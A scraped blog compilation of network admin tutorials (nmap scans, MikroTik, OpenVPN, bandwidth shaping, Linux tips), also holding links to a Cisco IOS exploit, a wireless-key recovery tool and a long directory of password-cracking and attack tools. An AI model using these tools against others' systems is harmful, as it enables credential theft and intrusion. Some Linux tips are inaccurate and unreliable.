ns2.spectranet.com [203.122.61.154] 126 (?) open
punt!
[root@ns2 files]#

Network Mapper (nmap)

Nmap from http://www.insecure.org/nmap is a all in one tool. To see a possible list of options use

[root@ns2 files]# nmap –h

[root@ns2 files]# nmap -sP 192.168.0.172

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host ns2.krishna.com (192.168.0.172) appears to be up.
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
[root@ns2 files]#

Nmap allows you to enter ranges in CIDR(Classless Inter-Domain Routing) block notation. The –oN will save the output to a human-readable format and use –oM to save it in a tab-delimited file.

[root@ns2 files]# nmap –sF 203.122.58.0/24 –oN outfile

Windows based port scanners


NetScanTools Pro 2000 http://www.nwpsw.com
SuperScan http://www.foundstone.com/rdlabs/termsofuse.php?filename=superscan.exe
WinScan: http://www.prosolve.com
IpEye http://www.ntsecurity.com
NetCat http://www.atstake.com/research/tools/nc11nt.zip
WUPS http://www.ntsecurity.nu
Fscan http://www.foundstone.com/rdlabs/termsofuse.php?filename=fscan.exe

Thanks Bro ...
Krishna
http://www.KrisinDigitalAge.com

Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit

http://www.secumania.org/exploits/remote/cisco-ios-12_x_11_x-http-remote-integer-overflow-exploit%0D%0A-2003081030210/लेबल

How to make a HotSpot gateway

The MikroTik HotSpot Gateway enables providing of public network access for clients using wireless or wired network connections. HotSpot Gateway should have at least two network interfaces:

1. HotSpot interface, which is used to connect HotSpot clients

2. LAN/WAN interface, which is used to access network resources.

The following picture shows wireless HotSpot setup



To setup simple HotSpot Gateway follow the steps below:

1. Configure wireless interface on HotSpot Gateway:
[admin@HotSpot_Gateway]> interface wireless set wlan1 ssid=HotSpot band=2.4ghz-b \
\... mode=ap-bridge

2. Configure ip address for HotSpot interface:
[admin@HotSpot_Gateway] > ip add add address=192.168.0.1/24 interface=wlan1

3. Configure ip address for WAN/LAN interface:
[admin@HotSpot_Gateway] > ip add add address=10.5.8.250/24 interface=ether1

4. Add a route on HotSpot Gateway
[admin@HotSpot_Gateway] > ip route add gateway=10.5.8.1

5. Configure Hotspot on wlan1 interface and add user admin with pasword test
[admin@MikroTik] > ip hotspot setup
hotspot interface: wlan1
local address of network: 192.168.0.1/24
masquerade network: yes
address pool of network: 192.168.0.2-192.168.0.254
select certificate: none
ip address of smtp server: 0.0.0.0
dns servers: 10.5.8.2
dns name: hs.example.net
name of local hotspot user: admin
password for the user: test

In order to access network resources HotSpot clients have to configure their wireless interfaces setting proper ssid, band and mode, and enabling dynamic host configuration (dhcp) on the wireless interface.

HTB-GEN cara mudah memanage Bandwidth

Diarsipkan di bawah: Mandriva — bayuart - yudha

Implementasi bandwidth management biasanya di terapkan pada main-gw (gateway utama) dimana main-gw menghandle beberapa klien yang mempunyai jatah bandwidth yang telah di tetapkan. Disini kita akan menggunakan tool bantu yang bernama HTB-GEN.
Pada distro linux kebanyakan sebenarnya htb/cbq sudah include di kernel default masing-masing distro, tinggal kita saja yang kurang familiar dengan perintah tc yang digunakan sebagai standar tool shaping bandwith. Untuk itulah kita menggunakan HTB-GEN disini.
Yang perlu diingat adalah :
Lisensi GPLv2 or later
Syarat dan kebutuhan untuk menjalankannya:
-bash
-QoS htb kernel support
-iproute2 tc
-iptables
-htb-init script (optional)

Ok kita mulai aja meng-implementasikan HTB-GEN ke mesin main-gw kita, langkah-langkahnya adalah sebagai berikut:
Langkah 1: Download

– htb-gen-0.8.4.tar.gz Source tarball
– htb-gen_0.8.4_all.deb Debian package
– htb-gen-0.8.4–1.noarch.rpm Aliened RPM package

Archive at http://www.praga.org.ar/dev/htb-gen/packages/

sesuaikan dengan distro based yang dipakai, disini saya pake mandriva cooker, otomatis harus download yang versi .rpm

Langkah 2: Install
untuk menginstall htb-gen di mandriva, tinggal menjalankan perintah
#urpmi htb-gen-0.8.4-1.noarch.rpm

Langkah 3: Konfigurasi
setelah langkah instalasi dilalui dengan sukses :) maka akan terdapat file konfigurasi standar htb-gen di direktori /etc/htb-gen.
Edit file /etc/htb-gen/htb-gen.conf, dengan editor kesayangan anda :)

#vim /etc/htb-gen/htb-gen.conf

perhatikan baris berikut ini:

iface_down=”eth1″ # Server LAN iface
iface_up=”eth0″ # Server INET iface
total_rate_down=1024 #Total download bw
total_rate_up=512 #Total upload bw

Kemudian di file /etc/htb-gen/htb-gen-rates.conf, perhatikan baris berikut :

# down down up up
# min max min max
#ip (rate) (ceil) (rate) (ceil)
192.168.1.2 0 64 0 32
192.168.1.3 0 128 0 64
192.168.1.4 0 256 0 128
10.0.0.1/30 256 512 128 256
200.80.22.2 256 256 256 256

Seperti yang terlihat

mudah sekali untuk membatasi suatu host atau network

ip beda network juga bisa digunakan

penulisan format ip dan network mengikuti aturan standar

mendukung fixed rate b/w

nilai nol atau “0″ artinya secara otomatis akan menggunakan b/w yang ada atau b/w yang tersisa.

Selanjutnya….

Langkah 4: Menjalakannya

Untuk menjalankan htb-gen sangat mudah, secara umum htb-gen dapat di jalankan dengan opsi sebagai berikut

#htb-gen tc_all

lebih lanjut dengan opsi htb-gen, bisa di cek dengan perintah

#htb-gen –help

Situs terkait dan resmi dari htb-gen bisa di cek di http://www.praga.org.ar/wacko/DevPraga/htbgen/

Instalasi OpenVPN Server + Shorewall

Sumber linux.or.id

Kenapa butuh VPN :
Q : Walaupun saya sedang berInternet ria di luar jaringan lokal kantor - saya ingin membuka aplikasi (CRM, ERP) maupun resources lokal. How?
A : Hmm, jaringan lokal virtual (VPN) ya?

VPN (Virtual Private Network), perpanjangan dari VPN sepertinya mewakili seperti apa fungsinya, adanya jalur khusus (tunnel) untuk mengamankan/mengirimkan data/informasi dengan menggunakan media jaringan atau Internet. Dari perangkat lunak yang gratisan maupun sampai produk yang harganya cukup mahal yang sudah diembedded dengan perangkat keras, seperti Cisco, FortiNet dan lainnya menunjukkan teknologi ini benar-benar sampai sekarang dibutuhkan. Benar ngak sih? Baiklah.

OpenVPN salah satu perangkat lunak VPN berlisensi GNU/GPL, yang akan kita gunakan. Pemamfaatan pustaka (library) OpenSSL untuk mengengkripsi data yang ditransfer, dengan kata lain fitur cipher-cipher (SHA1+DES, 3DES, RC4, AES) OpenSSL lainnya bisa dimamfaatkan juga. Ups, silahkan cari info detil ya.

Shorewall, salah satu alat bantu untuk mengatur penseleksian keluar masuk paket, menggunakan iptables.

2. Instalasi Openvpn
Distro linux yang digunakan (CentOS), shorewall, openssl berjalan OK

$ sudo yum -y install openssl openvpn
{tunggu hingga 100 % komplit}

$ cp -r /usr/share/doc/openvpn/easy-rsa /etc/openvpn/
$ cd /etc/openvpn/easy-rsa
$ vim vars
[sunting berkas vars, sesuaikan parameter]
export D=`pwd`
export KEY_CONFIG=$D/openssl.cnf
export KEY=$D/keys
export KEY_SIZE=1024
export KEY_COUNTRY=ID
export KEY_PROVINCE=NS
export KEY_CITY=MEDAN
export KEY_ORG="Antar Media Network"
export KEY_EMAIL="deRegen@antarmedia.net"
export KEY_OU="RnD"
export KEY_COMMON="vpn.antarmedia.net"
--- end of file ---

$ source ./vars
$ ./build-ca
$ ./build-key-server amnet
$ ./build-key myclient1
$ ./build-key myclient2
$ ./build-dh

Setelah proses pembeharuan key selesai dilakukan, selanjutnya siapkan berkas konfigurasi yang dibutuhkan.

$ vim /etc/openvpn/amnet.conf
port 1194
dev tun
local dev.antarmedia.com
proto udp
verb 5
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/amnet.crt
key /etc/openvpn/easy-rsa/keys/amnet.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
server 172.16.1.0 255.255.255.0
persist-key
persist-tun
status /etc/openvpn/openvpn-status.log
keepalive 10 120
comp-lzo
user nobody
group nobody
max-clients 10
cipher AES-128-CBC
--- end of file ---

$ chown -R nobody:nobody /etc/openvn/
$ chwon nobody:nobody /etc/openvpn/openvpn-status.log

3. Shorewall Konfigurasi
$ vim /etc/shorewall/zones
vpn ipv4

$ vim /etc/shorewall/rules
ACCEPT loc $FW udp 1194
ACCEPT net $FW udp 1194
ACCEPT vpn loc tcp 25,80,110,3128
REDIRECT vpn 3128 tcp www - !172.16.1.0/24

$ vim /etc/shorewall/tunnels
openvpnserver:1194 net 0.0.0.0/0

$ vim /etc/shorewall/masq
eth0 tun0 72.232.21.251

Catatan:
Generate key untuk client sebaiknya dibeda-bedakan, hal ini juga akan menghasilkan pengalokasian ip yang berbeda. Client dapat menggunakan OpenVPN GUI (http://openvpn.se)

Berkas konfigurasi OpenVPN pada lingkungan Windows XP Profesional SP 2 diletakkan (C:/Program Files/OpenVPN/config/myclient1.ovpn)

client
dev tun
proto udp
remote dev.antarmedia.com 1194
resolv-retry infinite
nobind
persist-key
persist-tun
pull
ca ca.crt
cert myclient1.crt
key myclient1.key
comp-lzo
verb4
cipher AES-128-CBC
--- end of file ---

Clients yang terhubung melalui terowongan vpn, tetap bisa mengakses situs dan termonitor dalam berkas squid.log. Openvpn diinstall di mesin yang berfungsi sebagai firewall juga.

Linux bantu cari file dari Hardisk yg kena format

File anda hilang?
itu salah sendiri...

HDD anda keformat?
Itu keteledoran anda...

makanya?
Jangan Oon....


Nih coba pake ini
Untuk Pengguna Linux ..

http://jbj.rapanden.dk/magicrescue/release/magicrescue-1.1.5.tar.gz


Coba --
Yudha Dewantoro

Tips Buat Pengguna Linux Baru

Tips Buat Pengguna Linux Baru

Tips 1:
Mengenai problem loading windows partisi di linux
[user@localhost]# mount /dev/hda1 -t vfat /mnt/win
Dan jangan lupa sebelum shutdown ketik "unmount"
[hendr4@localhost]# umount /mnt/win

Tip 2:
bikin Boot disk
[user@localhost]# mkbootdisk --device /dev/fd0 2.2.x-yy
dimana "2.2.x-yy" adalah versi dari kernel.
want to know bout u kernel version?gampang..
ketik aja "uname -a" di consolenya.

Tip 3:
Bila X Server kita Crash, tinggal jalankan kombinasi key ini [Ctrl+Alt +Bksp], itu akan mengembalikan sistem ke sedia kala..

Tip 4:
"ls" pasti lo semua da tau fungsinya, tapi ada alternatif laen bila suatu saat "ls" ga bisa dan system lo crash. Jawabannya adalah "echo"
simple khan echo akan memberikan kita list dari file dan folder sama seperti "ls" but lebih powerfull.
[user@localhost]$ echo *

Tip 5:
Ngedelet karakter '-'
[user@localhost]$ echo something > -tmp
coba delete file '-tmp'..
[user@localhost]$ rm -tmp
rm: invalid option -- t
Coba rm --help untuk informasi lebih lanjut
[user@localhost]$
weleh-weleh ga bisa didelete tuh...slow aja men
coba '--'
[user@localhost]$ rm -- -tmp
[user@localhost]$ rm "./-tmp"
"./" artinya lihat pada directori file '-tmp' dan delete.
para crackers slalu membuat files seperti "-r *".
[user@localhost]$ echo hye >"-r *"
Jadi bila kita nemuin file yg berkarakter '-' dan lo orang mo ngedeletnya don't try a fool tries to delete file using command "rm -r *" !!
Coba cara diatas coz "rm -r *" will deleting just one file it will just delete all the files in the system !! fool ha
[user@localhost]$ rm "./-r *"

Tip 6:
untuk mengetahui DNS, NameServer dan Mail Server sebuah host
[user@ubuntu:/]$ dig www.linux.or.id


regards,
Ko /yd

Setting Mikrotik ADSL speedy Router


Sebelumnya saya gambarkan dulu skema jaringannya:

LAN —> Mikrotik RouterOS —> Modem ADSL —> INTERNET

Untuk LAN, kita pake kelas C, dengan network 192.168.0.0/24. Untuk Mikrotik RouterOS, kita perlu dua ethernet card. Satu (ether1 - 192.168.1.2/24) untuk sambungan ke Modem ADSL dan satu lagi (ether2 - 192.168.0.1/24) untuk sambungan ke LAN. Untuk Modem ADSL, IP kita set 192.168.1.1/24.
Sebelum mengetikkan apapun, pastikan Anda telah berada pada root menu dengan mengetikkan “/”
Set IP untuk masing²ethernet card
ip address add address=192.168.1.2/24 interface=ether1
ip address add address=192.168.0.1/24 interface=ether2
Untuk menampilkan hasil perintah di atas ketikkan perintah berikut:
ip address print
Kemudian lakukan testing dengan mencoba nge-ping ke gateway atau ke komputer yg ada pada LAN. Jika hasilnya sukses, maka konfigurasi IP Anda sudah benar
ping 192.168.1.1
ping 192.168.0.10
Menambahkan Routing
ip route add gateway=192.168.1.1
Setting DNS
ip dns set primary-dns=202.134.1.10 allow-remote-requests=yes
ip dns set secondary-dns=202.134.0.155 allow-remote-requests=yes
Karena koneksi ini menggunakan Speedy dari Telkom, maka DNS yg aq pake ya punya Telkom. Silahkan sesuaikan dengan DNS provider Anda.
Setelah itu coba Anda lakukan ping ke yahoo.com misalnya:
ping yahoo.com
Jika hasilnya sukses, maka settingan DNS sudah benar
Source NAT (Network Address Translation) / Masquerading
Agar semua komputer yg ada di LAN bisa terhubung ke internet juga, maka Anda perlu menambahkan NAT (Masquerade) pada Mikrotik.
ip firewall nat add chain=srcnat action=masquerade out-interface=ether1
Sekarang coba lakukan ping ke yahoo.com dari komputer yang ada di LAN
ping yahoo.com
Jika hasilnya sukses, maka setting masquerade sudah benar
DHCP (DynamicHost Configuration Protocol)
Karena alasan supaya praktis, temenku pengin pake DHCP Server. Biar klo tiap ada klien yang konek, dia ga perlu setting IP secara manual. Tinggal obtain aja dari DHCP Server, beres dah. Untungnya Mikrotik ini juga ada fitur DHCP Servernya. Jadi ya ga ada masalah..

Membuat IP Address Pool
ip pool add name=dhcp-pool ranges=192.168.0.2-192.168.0.254
Menambahkan DHCP Network
ip dhcp-server network add address=192.168.0.0/24 gateway=192.168.0.1 dns-server=202.134.1.10,202.134.0.155
Menambahkan Server DHCP
ip dhcp-server add name=DHCP_LAN disabled=no interface=ether2 address-pool=dhcp-pool
Sekarang coba lakukan testing dari komputer klien, untuk me-request IP Address dari Server DHCP. Jika sukses, maka sekali lagi, settingannya udah bener
Bandwidth Control
Agar semua komputer klien pada LAN tidak saling berebut bandwidth, maka perlu dilakukan yg namanya bandwidth management atau bandwidth control
Model yg saya gunakan adalah queue trees. Untuk lebih jelas apa itu, silahkan merujuk ke situsnya Mikrotik
Kondisinya seperti ini:
Koneksi Speedy kan katanya speednya sampe 384/64 Kbps (Download/Upload), nah kondisi itu sangat jarang tercapai. Jadi kita harus cari estimasi rata²nya. Maka saya ambil minimalnya untuk download bisa dapet sekitar 300 Kbps dan untuk upload aq alokasikan 50 Kbps. Sedangkan untuk yg maksimumnya, untuk download kira² 380 Kbps dan upload 60 Kbps.
Lalu, jumlah komputer klien yang ada saat ini adalah 10 buah. Jadi harus disiapkan bandwidth itu untuk dibagikan kepada 10 klien tersebut.
Perhitungan untuk masing² klien seperti ini:
Minimal Download: 300 / 10 * 1024 = 30720 bps
Maximal Download: 380 / 10 * 1024 = 38912 bps
Minimal Upload: 50 / 10 * 1024 = 5120 bps
Maximal Upload: 60 / 10 * 1024 = 6144 bps
Selanjutnya kita mulai konfigurasinya:
Tandai semua paket yg asalnya dari LAN
ip firewall mangle add src-address=192.168.0.0/24 action=mark-connection new-connection-mark=Clients-con chain=prerouting
ip firewall mangle add connection-mark=Clients-con action=mark-packet new-packet-mark=Clients chain=prerouting
Menambahkan rule yg akan membatasi kecepatan download dan upload
queue tree add name=Clients-Download parent=ether2 packet-mark=Clients limit-at=30720 max-limit=38912
queue tree add name=Clients-Upload parent=ether1 packet-mark=Clients limit-at=5120 max-limit=6144
Sekarang coba lakukan test download dari beberapa klien, mestinya sekarang tiap2 klien akan berbagi bandwidthnya. Jika jumlah klien yg online tidak sampai 10, maka sisa bandwidth yang nganggur itu akan dibagikan kepada klien yg online.
Graphing
Mikrotik ini juga dilengkapi dengan fungsi monitoring traffic layaknya MRTG biasa. Jadi kita bisa melihat berapa banyak paket yg dilewatkan pada PC Mikrotik kita.
tool graphing set store-every=5min
Berikutnya yang akan kita monitor adalah paket² yg lewat semua interface yg ada di PC Mikrotik kita, klo di komputerku ada ether1 dan ether2.
tool graphing interface add-interface=all store-on-disk=yes
Sekarang coba arahkan browser anda ke IP Router Mikrotik. Klo aq di sini:
http://192.168.0.1/graphs/
Nanti akan ada pilihan interface apa aja yg ada di router Anda. Coba klik salah satu, maka Anda akan bisa melihat grafik dari paket2 yg lewat pada interface tersebut.

Dari tutorial diatas saya cuma sampai mengambil langkah pada setting penambahan NAT ( masquerade ) saja. Karena menurut saya DHCP yang sifatnya berubah ubah jadi nanti saat mau limit BW nya terkadang ip tidak sama. CMIIW. dan untuk setting limit saya melakukannya pada remote winbox yang lebih mudah, nah pertanyaan untuk saya sendiri. Kapan graph tool nya kamu install nak ? hehehhee... ok semoga berguna semuanya.
[donie kobain]

Selasa, 11 Maret 2008

GFI LANguard Network Security Scanner 8

GFI LANguard Network Security Scanner is a tool to audit network security and proactively secure it. It scans entire networks from an attacker's perspective, and analyses machines for open ports, shares, security alerts/vulnerabilities, service pack level, installed hotfixes and other NETBIOS information such as hostname, logged on user name, users etc. It does OS detection, password strength testing and detects registry issues.

GFI LANguard N.S.S. is a complete patch management solution. After it has scanned your network and determined missing patches and service packs - both in the operating system (OS) and in the applications - you can use GFI LANguard N.S.S. to deploy those service packs and patches network-wide.

Key Features in GFI LANguard Network Security Scanner 8

In this Help Net Security video, Andre Muscat, the Director for the Development of Network Security Products at GFI discusses the key features in the latest release of the GFI LANguard Network Security Scanner.

Download :
http://www.net-security.org/dl/software/languardnss8.exe


yudhax

HACKING Wireless KeyView

WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP and by the 'WLAN AutoConfig' service of Windows Vista. It allows you to easily save all keys to text/html/xml file, or copy a single key to the clipboard.

Download :
http://www.net-security.org/dl/software/wirelesskeyview.zip

Yudhax

Draft Hacking

Awareness and Training Awareity MOAT
www.awareity.com

Birch Systems Privacy Posters
www.privacyposters.com

Greenidea Visible Statement
www.greenidea.com

Interpact, Inc. Awareness Resources
www.thesecurityawarenesscompany.com

NIST resources
http://csrc.nist.gov/ATE

SANS Security Awareness Program
www.sans.org/awareness/awareness.php

Security Awareness, Inc. Awareness Resources
www.securityawareness.com

Bluetooth BlueScanner
www.networkchemistry.com/products/bluescanner.php

Bluesnarfer
www.alighieri.org/tools/bluesnarfer.tar.gz

BlueSniper rifle
www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt

Blooover
http://trifinite.org/trifinite_stuff_blooover.html

Bluejacking community site
www.bluejackq.com

Detailed presentation on the various Bluetooth attacks
http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf

NIST Special Publication 800-48
http://csrc.nist.gov/publications/nistpubs/800-48/NIST_SP_800-48.pdf

Certifications Certified Ethical Hacker
www.eccouncil.org/CEH.htm

Dictionary Files and Word Lists ftp://ftp.cerias.purdue.edu/pub/dictftp://ftp.ox.ac.uk/pub/wordlists

http://packetstormsecurity.nl/Crackers/wordlists

www.outpost9.com/files/WordLists.html

Default vendor passwords
www.cirt.net/cgi-bin/passwd.pl

Exploit Tools CORE IMPACT
www.coresecurity.com

Metasploit
www.metasploit.com/projects/Framework

General Research Tools AfriNIC
www.afrinic.net

APNIC
www.apnic.net

ARIN
www.arin.net/whois/index.html

CERT/CC Vulnerability Notes Database
www.kb.cert.org/vuls

ChoicePoint
www.choicepoint.com

Common Vulnerabilities and Exposures
http://cve.mitre.org/cve

DNSstuff.com
www.DNSstuff.com

Google
www.google.com

Government domains
www.dotgov.gov

Hoover's business information
www.hoovers.com

LACNIC
www.lacnic.net

Military domains
www.nic.mil/dodnic

NIST National Vulnerability Database
http://nvd.nist.gov

RIPE Network Coordination Centre
www.ripe.net/whois

Sam Spade
www.samspade.org

SecurityTracker
http://securitytracker.com

Switchboard.com
www.switchboard.com

U.S. Patent and Trademark Office
www.uspto.gov

U.S. Search.com
www.ussearch.com

U.S. Securities and Exchange Commission
www.sec.gov/edgar.shtml

Whois.org
www.whois.org

Yahoo! Finance site
http://finance.yahoo.com

Hacker Stuff 2600 @@md The Hacker Quarterly magazine
www.2600.com

Blacklisted 411
www.blacklisted411.net

Computer Underground Digest
www.soci.niu.edu/~cudigest

Hacker T-shirts, equipment, and other trinkets
www.thinkgeek.com

Honeypots: Tracking Hackers
www.tracking-hackers.com

The Online Hacker Jargon File
www.jargon.8hz.com

PHRACK
www.phrack.org

Linux Amap
http://packages.debian.org/unstable/net/amap

Bastille Linux Hardening Program
www.bastille-linux.org

BackTrack
www.remote-exploit.org/index.php/BackTrack

Comprehensive listing of live bootable Linux toolkits
www.frozentech.com/content/livecd.php

Debian Linux Security Alerts
www.debian.org/security

Linux Administrator's Security Guide
www.seifried.org/lasg

Linux Kernel Updates
www.linuxhq.com

Linux Security Auditing Tool (LSAT)
http://usat.sourceforge.net

Metasploit
www.metasploit.com

Network Security Toolkit
www.networksecuritytoolkit.org

Red Hat Linux Security Alerts
www.redhat.com/securityupdates

Security Tools Distribution
http://s-t-d.org

Slackware Linux Security Advisories
www.slackware.com/security

SUSE Linux Security Alerts
www.suse.com/us/business/security.html

Tiger
ftp://ftp.debian.org/debian/pool/main/t/tiger

VLAD the Scanner
www.bindview.com/Services/RAZOR/Utilities/Unix_Linux/vlad.cfm

Log Analysis ArcSight Enterprise Security Manager
www.arcsight.com/product.htm

GFI LANguard Security Event Log Monitor
www.gfi.com/lanselm

Internet Security Systems Managed Services
www.iss.net/products_services/managed_services

LogAnalysis.org system logging resources
www.loganalysis.org

Malware chkrootkit
www.chkrootkit.org

EICAR Anti-Virus test file
www.eicar.org/anti_virus_test_file.htm

The File Extension Source
http://filext.com

McAfee AVERT Stinger
http://vil.nai.com/vil/stinger

Rkdet
http://vancouver-webpages.com/rkdet

Wotsit's Format
www.wotsit.org

Messaging Abuse.net SMTP relay checker
www.abuse.net/relay.html

Brutus
http://securitylab.ru/_tools/brutus-aet2.zip

Cain and Abel
www.oxid.it/cain.html

DNSstuff.com relay checker
www.dnsstuff.com

GFI e-mail security test
www.gfi.com/emailsecuritytest

How to disable SMTP relay on various e-mail servers
www.mail-abuse.com/an_sec3rdparty.html

mailsnarf
www.monkey.org/~dugsong/dsniff or
www.datanerds.net/~mike/dsniff.html for the Windows version

Sam Spade for Windows
www.samspade.org/ssw

smtpscan
www.greyhats.org/?smtpscan

NetWare Adrem Freecon
www.adremsoft.com

Craig Johnson's BorderManager resources
http://nscsysop.hypermart.net

JRB Software
www.jrbsoftware.com

NCPQuery
www.bindview.com/resources/razor/files/ncpquery-1.2.tar.gz

NetServerMon
www.simonsware.com/Products.shtml

Novell Product Updates
http://support.novell.com/filefinder

Pandora
www.nmrc.org/project/pandora

Rcon program
http://packetstormsecurity.nl/Netware/penetration/rcon.zip

Remote
www.securityfocus.com/data/vulnerabilities/exploits/Remote.zip

UserDump
www.hammerofgod.com/download/userdump.zip

Networks Cain and Abel
www.oxid.it/cain.html

CommView
www.tamos.com/products/commview

dsniff
www.monkey.org/~dugsong/dsniff

Essential NetTools
www.tamos.com/products/nettools

Ethereal network analyzer
www.ethereal.com

EtherPeek
www.wildpackets.com/products/etherpeek/overview

ettercap
http://ettercap.sourceforge.net

Firewalk
www.packetfactory.net/firewalk

Getif
www.wtcs.org/snmp4tpc/getif.htm

GFI LANguard Network Scanner
www.gfi.com/lannetscan

GNU MAC Changer
www.alobbs.com/macchanger

IETF RFCs
www.rfc-editor.org/rfcxx00.html

LanHound
www.sunbelt-software.com/LanHound.cfm

MAC address vendor lookup
http://standards.ieee.org/regauth/oui/index.shtml

Nessus vulnerability scanner
www.nessus.org

Netcat
www.vulnwatch.org/netcat/nc111nt.zip

NetScanTools Pro all-in-one network testing tool
www.netscantools.com

Nmap port scanner
www.insecure.org/nmap

NMapWin
http://sourceforge.net/projects/nmapwin

Port number listing
www.iana.org/assignments/port-numbers

Port number lookup
www.cotse.com/cgi-bin/port.cgi

QualysGuard vulnerability assessment tool
www.qualys.com

SNMPUTIL
www.wtcs.org/snmp4tpc/FILES/Tools/SNMPUTIL/SNMPUTIL.zip

Sunbelt Network Security Inspector
www.sunbelt-software.com/SunbeltNetworkSecurityInspector.cfm

SuperScan port scanner
www.foundstone.com/resources/proddesc/superscan.htm

TrafficIQ Pro
www.karalon.com

WhatIsMyIP
www.whatismyip.com

Password Cracking BIOS passwords
http://labmice.techtarget.com/articles/BIOS_hack.htm

Brutus
http://securitylab.ru/_tools/brutus-aet2.zip

Cain and Abel
www.oxid.it/cain.html

Chknull
www.phreak.org/archives/exploits/novell/chknull.zip

Crack
ftp://coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack

Elcomsoft Distributed Password Recovery
www.elcomsoft.com/edpr.html

John the Ripper
www.openwall.com/john

Ophcrack
www.objectif-securite.ch/ophcrack

Proactive Password Auditor
www.elcomsoft.com/ppa.html

Proactive System Password Recovery
www.elcomsoft.com/pspr.html

pwdump3
www.openwall.com/passwords/dl/pwdump/pwdump3v2.zip

NetBIOS Auditing Tool
www.securityfocus.com/tools/543

NTAccess
www.mirider.com/ntaccess.html

RainbowCrack
www.antsight.com/zsl/rainbowcrack

RainbowCrack-Online
www.rainbowcrack-online.com

Rainbow tables
http://rainbowtables.shmoo.com

TSGrinder
www.hammerofgod.com/download/tsgrinder-2.03.zip

WinHex
www.winhex.com

Patch Management BigFix Enterprise Suite Patch Management
www.bigfix.com/products/patch.html

Ecora Patch Manager
www.ecora.com/ecora/products/patchmanager.asp

GFI LANguard Network Security Scanner
www.gfi.com/lannetscan

HFNetChkPro from Shavlik Technologies
www.shavlik.com/product_cat_patch_mang.aspx

Patch Authority Plus
www.scriptlogic.com/products/patchauthorityplus

PatchLink
www.patchlink.com

SysUpdate
www.securityprofiling.com

UpdateEXPERT from St. Bernard Software
www.stbernard.com/products/updateexpert/products_updateexpert.asp

Windows Server Update Services from Microsoft
www.microsoft.com/windowsserversystem/updateservices/default.mspx

Source Code Analysis Compuware
www.compuware.com/products/devpartner/securitychecker.htm

Fortify Software
www.fortifysoftware.com

Klocwork
www.klocwork.com

Ounce Labs
www.ouncelabs.com

SPI Dynamics
www.spidynamics.com/products/devinspect/index.html

Security Standards Center for Internet Security's Benchmarks/Scoring Tools
www.cisecurity.org

NIST Special Publications
http://csrc.nist.gov/publications/nistpubs/index.html

Open Source Security Testing Methodology Manual
www.isecom.org/osstmm

SANS Step-by-Step Guides
http://store.sans.org

Security Education Kevin Beaver's Security on Wheels podcasts and information security training resources
www.securityonwheels.com

Privacy Rights Clearinghouse's Chronology of Data Breaches Reported Since the ChoicePoint Incident
www.privacyrights.org/ar/ChronDataBreaches.htm

Storage CHAP Password Tester
www.isecpartners.com/tools.html#CPT

CIFSShareBF
www.isecpartners.com/SecuringStorage/CIFShareBF.zip

GrabiQNs
www.isecpartners.com/SecuringStorage/GrabiQNs.zip

NASanon
www.isecpartners.com/SecuringStorage/NASanon.zip

StorScan
www.isecpartners.com/tools.html#StorScan

Risk Analysis and Threat Modeling SecureITree
www.amenaza.com

Software Engineering Institute's OCTAVE methodology
www.cert.org/octave

Voice over IP Cain and Abel
www.oxid.it/cain.html

NIST's SP800-58 document
http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf

PROTOS
www.ee.oulu.fi/research/ouspg/protos

SearchVoIP.com
http://searchvoip.techtarget.com

SIP Forum Test Framework
www.sipfoundry.org/sftf/index.html

sipsak
http://sipsak.org

SiVuS
www.vopsecurity.org/html/tools.html

vomit
http://vomit.xtdnet.nl

War Dialing Sandstorm Enterprises PhoneSweep
www.sandstorm.net/products/phonesweep

Sandstorm Enterprises Sandtrap wardialing honepot
www.sandstorm.net/products/sandtrap

THC-Scan
http://packetstormsecurity.org/groups/thc/thc-ts201.zip

ToneLoc
www.securityfocus.com/data/tools/auditing/pstn/tl110.zip

Web Applications and Databases 2600's Hacked Pages
www.2600.com/hacked_pages

Acunetix Web Vulnerability Scanner
www.acunetix.com

AppDetective
www.appsecinc.com/products/appdetective

Brutus
http://securitylab.ru/_tools/brutus-aet2.zip

HTTrack Website Copier
www.httrack.com

Foundstone's Hacme Tools
http://www.foundstone.com/resources/s3i_tools.htm

Google Hacking Database
http://johnny.ihackstuff.com/index.php?module=prodreviews

Netcraft
www.netcraft.com

NGSSquirrel
www.ngssoftware.com/software.htm

N-Stealth Security Scanner
www.nstalker.com/eng/products/nstealth

Paros Proxy
www.parosproxy.org

Pete Finnigan's listing of Oracle scanning tools
www.petefinnigan.com/tools.htm

Port 80 Software's ServerMask
www.port80software.com/products/servermask

Port 80 Software's Custom Error
www.port80software.com/products/customerror

SiteDigger
www.foundstone.com/resources/proddesc/sitedigger.htm

SQLPing2 and SQLRecon
www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx

WebInspect
www.spidynamics.com/products/webinspect/index.html

WebGoat
www.owasp.org/index.php/Category:OWASP_WebGoat_Project

Windows CORE IMPACT
www.coresecurity.com

DumpSec
www.somarsoft.com

Effective File Search
www.sowsoft.com/search.htm

FileLocator Pro
www.mythicsoft.com/filelocatorpro

Legion
http://packetstormsecurity.nl/groups/rhino9/legionv21.zip

Metasploit
www.metasploit.com

Microsoft Baseline Security Analyzer
www.microsoft.com/technet/security/tools/mbsahome.mspx

Microsoft TechNet Security Center
www.microsoft.com/technet/security/Default.asp

Network Users
www.optimumx.com/download/netusers.zip

Rpcdump
www.bindview.com/Services/RAZOR/Utilities/Windows/rpctools1.0-readme.cfm

SMAC MAC address changer
www.klcconsulting.net/smac

Vision
www.foundstone.com/knowledge/proddesc/vision.html

Walksam
www.bindview.com/Services/RAZOR/Utilities/Windows/rpctools1.0-readme.cfm

Winfo
www.ntsecurity.nu/toolbox/winfo

Wireless Networks Aircrack
http://freshmeat.net/projects/aircrack

AirMagnet Laptop Analyzer
www.airmagnet.com/products/laptop.htm

AiroPeek SE
www.wildpackets.com/products/airopeek/airopeek_se/overview

AirSnort
http://airsnort.shmoo.com

Cantenna war-driving kit
http://mywebpages.comcast.net/hughpep

CommView for Wi-Fi
www.tamos.com/products/commwifi

Digital Hotspotter
www.canarywireless.com

